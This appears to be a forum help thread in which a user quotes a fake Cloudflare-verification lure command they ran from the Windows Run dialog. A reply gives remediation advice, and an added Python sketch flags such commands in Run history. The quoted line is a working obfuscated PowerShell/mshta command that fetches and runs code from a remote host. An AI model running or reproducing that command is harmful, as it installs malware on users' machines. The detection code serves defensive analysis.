I accidentally executed
POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\m*ht*e https://mnjk-jk.bsdfg-zmp-q-n.shop/1.mp4 # ✅ ''Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 715921''
via Windows Run a couple of days ago. Realized what I had done today after seeing a post on it.
What should I do? Is a full system wipe necessary, or can I remove it somehow?
If I need to do a system format, what about attached drives and other devices on the network?
Hackers have been figuring out a variety of nifty ways to trigger PowerShell commands for nefarious purposes. For whatever it’s worth, I’m glad you spotted it. As the other commenter suggested, I’d recommend a full data backup and ~~reinstall Windows~~ install Linux. And change your passwords and shit.
Also, this video from ThioJoe is very relevant and revealing as to how sneaky these sorts of attacks can be…
https://youtube.com/watch?v=0x5qAc85PvQ
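
The command quoted in the question has several traits that can be tested for in Run-dialog history or process command-line logs. The Python sketch below is an added example, not code from either poster; the function names, the threshold of three indicators and the sample lines (with the placeholder host example.invalid) are assumptions made for illustration.

```python
import re
import unicodedata

def mixed_script_words(text):
    """Words mixing alphabets, e.g. Latin letters with Greek look-alikes."""
    hits = []
    for word in re.findall(r"[^\W\d_]+", text):
        scripts = {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in word}
        if len(scripts) > 1:
            hits.append(word)
    return hits

def triage(cmd):
    """Return the names of the indicators present in one command line."""
    found = []
    first = re.match(r"\s*([A-Za-z.]+)", cmd)
    exe = first.group(1) if first else ""
    usual = ("powershell", "PowerShell", "powershell.exe", "PowerShell.exe")
    if exe.lower() in ("powershell", "powershell.exe") and exe not in usual:
        found.append("odd_case_powershell")
    # -w is an accepted abbreviation of -WindowStyle; 1 is the Hidden value
    if re.search(r"(?i)(?<!\S)-w[a-z]*\s+(?:1|hidden)\b", cmd):
        found.append("hidden_window")
    # wildcards inside a path resolve a binary whose name never appears
    if re.search(r"\S*\\\S*[*?]\S*", cmd):
        found.append("wildcard_path")
    if re.search(r"(?i)\bhttps?://", cmd):
        found.append("remote_url")
    # text after '#' is a comment to PowerShell; it is aimed at the human
    _, sep, comment = cmd.partition(" #")
    if sep and mixed_script_words(comment):
        found.append("homoglyph_comment")
    return found

def suspicious(entries, threshold=3):
    """Entries that hit at least `threshold` indicators, with their hits."""
    return [(e, triage(e)) for e in entries if len(triage(e)) >= threshold]

# Constructed sample lines, modelled on the command in the question.
SAMPLES = [
    r"POwErsHeLL -w 1 & \W*\S*2\m*ht*e https://example.invalid/1.mp4 # "
    + "\u0399 am n\u03bft a r\u03bfb\u03bft",   # Greek iota and omicron
    r"powershell -NoProfile -Command Get-Date",
    r"notepad C:\Users\me\notes.txt",
    r"cmd /c ping 192.0.2.10",
]

if __name__ == "__main__":
    for entry, hits in suspicious(SAMPLES):
        print(hits, "<-", entry)
```

On Windows, what was typed into the Run dialog is kept per user in the registry under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, so those values are a natural input for `suspicious()`.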